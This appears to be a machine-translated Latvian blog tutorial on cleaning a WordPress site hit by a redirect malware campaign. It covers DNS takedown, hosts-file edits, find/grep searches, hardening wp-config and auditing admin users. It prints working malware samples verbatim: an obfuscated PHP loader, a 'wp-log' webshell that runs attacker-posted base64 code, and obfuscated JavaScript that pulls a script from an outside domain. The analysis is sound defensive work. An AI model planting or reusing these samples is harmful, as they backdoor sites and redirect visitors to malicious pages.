Fix Redirect WordPress Hack 2023 (Virus Redirect)

WordPress tā noteikti ir visvairāk izmantotā platforma CMS (Content Management System) gan emuāriem, gan iesācēju tiešsaistes veikaliem (ar moduli WooCommerce), kas padara to par vislielāko datoru uzbrukumu (uzlaušanas) mērķi. Viena no visbiežāk izmantotajām uzlaušanas operācijām ir vērsta uz apdraudētās vietnes novirzīšanu uz citām tīmekļa lapām. Redirect WordPress Hack 2023 ir salīdzinoši jauna ļaunprātīga programmatūra, kuras rezultātā visa vietne tiek novirzīta uz surogātpasta tīmekļa lapām vai kas savukārt var inficēt lietotāju datorus.

Ja jūsu vietne ir izstrādāta WordPress tiek novirzīts uz citu vietni, tad tas, visticamāk, ir jau slavenā pāradresācijas uzlaušanas upuris.

Šajā pamācībā jūs atradīsiet nepieciešamo informāciju un noderīgus padomus, ar kuru palīdzību jūs varat atvīrusu vietni, kas ir inficēta ar novirzīšanu. WordPress Hack (Virus Redirect). Komentāros varat iegūt papildu informāciju vai lūgt palīdzību.

Tāda vīrusa noteikšana, kas novirza vietnes WordPress

Pēkšņs un nepamatots vietnes apmeklējuma samazinājums, pasūtījumu skaita (interneta veikalu gadījumā) vai reklāmas ieņēmumu samazināšanās ir pirmās pazīmes, ka kaut kas nav kārtībā. Notiek atklāšanaRedirect WordPress Hack 2023” (Virus Redirect) var veikt arī “vizuāli”, kad atverat vietni un tiekat novirzīts uz citu tīmekļa lapu.

No pieredzes izriet, ka lielākā daļa tīmekļa ļaunprātīgas programmatūras ir saderīgas ar interneta pārlūkprogrammām: Chrome, Firefox, Edge, Opera. Ja esat datora lietotājs Mac, šie vīrusi nav īsti redzami pārlūkprogrammā Safari. Drošības sistēma no Safari klusi bloķēt šos ļaunprātīgos skriptus.

Ko darīt, ja jūsu vietne ir inficēta ar Redirect WordPress Hack

Es ceru, ka pirmais solis ir nekrist panikā vai izdzēst vietni. Pat inficētos vai vīrusu failus sākotnēji nevajadzētu dzēst. Tie satur vērtīgu informāciju, kas var palīdzēt saprast, kur atrodas drošības pārkāpums un kas ietekmēja vīrusu. Modus operandi.

Aizveriet vietni sabiedrībai.

Kā aizvērt vīrusu vietni apmeklētājiem? Vienkāršākais ir izmantot DNS pārvaldnieku un dzēst "A" (domēna nosaukuma) IP vai definēt neesošu IP. Tādējādi vietnes apmeklētāji tiks pasargāti no tā redirect WordPress hack kas var novest viņus uz vīrusu vai SPAM tīmekļa lapām.

Ja lietojat CloudFlare kā DNS pārvaldnieks jūs piesakāties kontā un izdzēšat DNS ierakstus "A” domēna vārdam. Tādējādi vīrusa skartais domēns paliks bez IP, tam vairs nevarēs piekļūt no interneta.

Jūs nokopējat vietnes IP un "novadāt" to tā, lai tikai jūs varētu tai piekļūt. No sava datora.

Kā datoros mainīt vietnes īsto IP Windows?

Šo metodi bieži izmanto, lai bloķētu piekļuvi noteiktām vietnēm, rediģējot "hosts" failu.

1. Jūs atverat Notepad vai cits teksta redaktors (ar tiesībām administrator) un rediģējiet failu "hosts". Tas atrodas:

C:\Windows\System32\drivers\etc\hosts

2. Failā "hosts" pievienojiet "maršruts" savas vietnes reālajai IP adresei. IP izdzēsts iepriekš no DNS pārvaldnieka.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Saglabājiet failu un pārlūkprogrammā piekļūstiet vietnei.

Ja vietne netiek atvērta un jūs neesat izdarījis neko nepareizu failā "hosts", visticamāk, tā ir DNS kešatmiņa.

Lai notīrītu DNS kešatmiņu operētājsistēmā Windows, atvērts Command Prompt, kur palaižat komandu:

ipconfig /flushdns

Kā datoros mainīt vietnes īsto IP Mac / MacGrāmata?

Datoru lietotājiem Mac ir nedaudz vienkāršāk mainīt vietnes īsto IP.

1. Atveriet utilītu Terminal.

2. Palaidiet komandrindu (lai palaistu sistēmas paroli):

sudo nano /etc/hosts

3. Tāpat kā datoriem Windows, pievienojiet domēna īsto IP.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Saglabājiet izmaiņas. Ctrl+X (y).

Pēc "maršrutēšanas" jūs esat vienīgā persona, kas var piekļūt inficētajai vietnei Redirect WordPress Hack.

Pilna vietnes dublēšana - faili un datu bāze

Pat ja tas ir inficēts ar "redirect WordPress hack”, ieteikums ir izveidot vispārēju visas vietnes dublējumu. Faili un datubāze. Iespējams, jūs varētu arī saglabāt abu failu lokālās kopijas no public / public_html kā arī datu bāze.

Inficēto un modificēto failu identifikācija Redirect WordPress Hack 2023

Galvenie mērķa faili WordPress tur ir index.php (saknē), header.php, index.php si footer.php no tēmas WordPress aktīviem. Manuāli pārbaudiet šos failus un identificējiet ļaunprātīgu kodu vai ļaunprātīgas programmatūras skriptu.

2023. gadā vīrussRedirect WordPress Hack” ielieciet index.php veidlapas kods:

(Es neiesaku palaist šos kodus!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Atšifrēts, šis ļaunprātīgs skripts būtībā tās ir vietnes inficēšanās sekas WordPress. Tas nav ļaunprogrammatūras skripts, tas ir skripts, kas ļauj novirzīt inficēto tīmekļa lapu. Ja mēs atšifrējam iepriekš minēto skriptu, mēs iegūstam:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

Lai identificētu visus serverī esošos failus, kuros ir šis kods, ir labi, ja jums ir piekļuve SSH uz serveri, lai palaistu failu pārbaudes un pārvaldības komandrindas Linux.

Saistītie: Kā ar palīdzību noskaidrot, vai jūsu emuārs ir inficēts Google Search . (WordPress Vīruss)

Zemāk ir divas komandas, kas noteikti ir noderīgas, lai identificētu nesen modificētos failus un failus, kas satur noteiktu kodu (virkni).

Kā jūs redzat tālāk Linux PHP faili ir mainīti pēdējo 24 stundu laikā vai kādā citā laika posmā?

Pasūtīt"find” ir ļoti vienkārši lietojams un ļauj pielāgot laika periodu, meklēšanas ceļu un failu veidu.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

Izvadā jūs saņemsit informāciju par faila modificēšanas datumu un laiku, rakstīšanas / lasīšanas / izpildes atļaujām (chmod) un kurai grupai/lietotājam tas pieder.

Ja vēlaties pārbaudīt pirms vairākām dienām, mainiet vērtību "-mtime -1"vai izmantojiet "-mmin -360” minūtes (6 stundas).

Kā meklēt kodu (virkni) PHP, Java failos?

Komandrinda "atrast", kas ļauj ātri atrast visus PHP vai Java failus, kas satur noteiktu kodu, ir šāda:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Komanda meklēs un parādīs failus .php si .js satur "uJjBRODYsU".

Izmantojot divas iepriekš minētās komandas, jūs ļoti viegli uzzināsit, kuri faili nesen ir modificēti un kuri satur ļaunprātīgas programmatūras kodu.

Noņem ļaundabīgo kodu no modificētajiem failiem, neapdraudot pareizo kodu. Manā scenārijā ļaunprogrammatūra tika ievietota pirms atvēršanas <head>.

Izpildot pirmo komandu "atrast", ļoti iespējams serverī atklāt jaunus failus, kas nav jūsu WordPress ne arī tu tur ielicis. Faili, kas pieder vīrusa tipam Redirect WordPress Hack.

Izpētītajā scenārijā faili ar veidlapu “wp-log-nOXdgD.php". Tie ir "spawn" faili, kas satur arī ļaunprātīgas programmatūras kodu, ko vīruss izmanto novirzīšanai.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

" tipa failu mērķiswp-log-*” mērķis ir izplatīt novirzīšanas uzlaušanas vīrusu uz citām serverī mitinātām vietnēm. Tas ir ļaunprātīgas programmatūras kods, kura veids ir "webshell” sastāv no a pamata sadaļa (kurā ir definēti daži šifrēti mainīgie) un o izpildes sadaļa caur kuru uzbrucējs mēģina ielādēt un izpildīt sistēmā ļaunprātīgu kodu.

Ja ir mainīgais POST nosaukts 'bhun tā šifrētā vērtība MD5 ir vienāds ar "8f1f964a4b4d8d1ac3f0386693d28d03", pēc tam šķiet, ka skripts raksta šifrēto saturu base64 cita mainīgā ar nosaukumu 'b3' pagaidu failā un pēc tam mēģina iekļaut šo pagaidu failu.

Ja ir mainīgais POST vai GET nosaukts 'tick", skripts atbildēs ar vērtību MD5 no virknes "885".

Lai identificētu visus servera failus, kuros ir šis kods, izvēlieties kopīgu virkni un pēc tam palaidiet komandu "find” (līdzīgi kā iepriekš). Dzēsiet visus failus, kas satur šo ļaunprātīgas programmatūras kodu.

Drošības trūkumu izmantoja Redirect WordPress Hack

Visticamāk, šis novirzīšanas vīruss ierodas caur administratīvā lietotāja izmantošana WordPress vai identificējot a ievainojams spraudnis kas ļauj pievienot lietotājus ar privilēģijām administrator.

Lielākajai daļai vietņu, kas izveidotas uz platformas WordPress tas ir iespējams motīvu vai spraudņu failu rediģēšanano administrēšanas saskarnes (Dashboard). Tādējādi ļaunprātīga persona var pievienot ļaunprātīgas programmatūras kodu motīvu failiem, lai ģenerētu iepriekš parādītos skriptus.

Šāda ļaunprātīgas programmatūras koda piemērs ir šāds:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript identificēts tēmas galvenē WordPress, uzreiz pēc etiķetes atvēršanas <head>.

Ir diezgan grūti atšifrēt šo JavaScript, taču ir acīmredzams, ka tas vaicā citu tīmekļa adresi, no kurienes tas, visticamāk, ienes citus skriptus, lai izveidotu failus "wp-log-*”, par ko es runāju iepriekš.

Atrodiet un izdzēsiet šo kodu no visiem failiem PHP ietekmēta.

Cik es nopratu, šis kods bija manuāli pievienots jauns lietotājs ar administratora tiesībām.

Tāpēc, lai novērstu ļaunprātīgas programmatūras pievienošanu no informācijas paneļa, vislabāk ir atspējot rediģēšanas iespēju WordPress Motīvi/spraudņi no informācijas paneļa.

Rediģēt failu wp-config.php un pievienojiet rindas:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Pēc šo izmaiņu veikšanas neviens lietotājs WordPress jūs vairs nevarēsit rediģēt failus no informācijas paneļa.

Pārbaudiet lietotājus ar lomu Administrator

Tālāk ir sniegts SQL vaicājums, ko varat izmantot, lai meklētu lietotājus ar lomu administrator platformā WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Šis vaicājums atgriezīs visus tabulā esošos lietotājus wp_users kurš piešķīris lomu administrator. Vaicājums tiek veikts arī tabulai wp_usermeta meklēt meta 'wp_capabilities', kurā ir informācija par lietotāju lomām.

Vēl viena metode ir to identificēšana no: Dashboard → Users → All Users → Administrator. Tomēr pastāv prakse, ar kuru lietotāju var paslēpt informācijas paneļa panelī. Tātad, labākais veids, kā redzēt lietotājusAdministrator"In WordPress ir iepriekš minētā SQL komanda.

Manā gadījumā es datubāzē identificēju lietotāju ar vārdu "wp-import-user". Diezgan suģestējoši.

Arī no šejienes jūs varat redzēt datumu un laiku, kad lietotājs WordPress tika izveidots. Lietotāja ID ir arī ļoti svarīgs, jo tas meklē servera žurnālus. Tādā veidā jūs varat redzēt visas šī lietotāja darbības.

Dzēst lietotājus ar lomu administrator ko tad tu nezini mainīt paroles visiem administratīvajiem lietotājiem. Redaktors, Autors, Administrator.

Mainiet SQL datu bāzes lietotāja paroli ietekmētās vietnes.

Pēc šo darbību veikšanas vietni var restartēt visiem lietotājiem.

Tomēr paturiet prātā, ka tas, ko es prezentēju iepriekš, ir viens no, iespējams, tūkstošiem gadījumu, kad vietne ir inficēta ar Redirect WordPress Hack 2023. gadā.

Ja jūsu vietne ir inficēta un jums ir nepieciešama palīdzība vai jums ir kādi jautājumi, ir atvērta komentāru sadaļa.